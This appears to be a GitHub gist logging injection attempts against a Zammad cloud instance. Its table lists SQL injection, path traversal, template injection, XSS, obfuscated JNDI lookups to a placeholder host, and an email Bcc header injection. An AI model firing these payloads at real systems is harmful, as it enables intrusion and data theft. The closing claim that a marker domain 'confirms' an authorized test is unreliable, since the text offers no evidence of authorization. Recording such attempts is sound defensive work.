Skip to content

Instantly share code, notes, and snippets.

@learntheropes
Last active May 26, 2026 18:58
Show Gist options
  • Select an option

  • Save learntheropes/5fc71ca4edecf83bab9787feebf90836 to your computer and use it in GitHub Desktop.

Select an option

Save learntheropes/5fc71ca4edecf83bab9787feebf90836 to your computer and use it in GitHub Desktop.
Zammad cloud injection attempts
ID Timestamp Payload Type
8278 2026-05-17T14:22:19Z ' OR 1=1-- SQL injection
8279 2026-05-17T14:22:21Z ../../etc/passwd Path traversal
8280 2026-05-17T14:22:23Z {{7*7}} Template injection (SSTI)
8281 2026-05-17T14:22:25Z <script> XSS
8282 2026-05-17T14:22:27Z ${jndi:ldap://x} JNDI lookup
8283 2026-05-17T14:22:29Z aaaa… (~230 chars) Buffer/overflow test
8311 2026-05-17T14:46:54Z ${jndi:ldap://audit-marker-research.invalid/a} JNDI (LDAP)
8312 2026-05-17T14:46:56Z ${jndi:dns://audit-marker-research.invalid} JNDI (DNS)
8313 2026-05-17T14:46:58Z ${jndi:rmi://audit-marker-research.invalid/a} JNDI (RMI)
8314 2026-05-17T14:47:00Z ${jndi:${lower:l}${lower:d}ap://audit-marker-research.invalid/a} Obfuscated JNDI
8315 2026-05-17T14:47:02Z ${${::-j}${::-n}${::-d}${::-i}:ldap://audit-marker-research.invalid/a} Obfuscated JNDI
8324 2026-05-17T14:48:02Z Bcc: attacker@evil.test Email header injection

The audit-marker-research.invalid marker in the JNDI payloads confirms this was an internal/authorized test, not an external attack.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment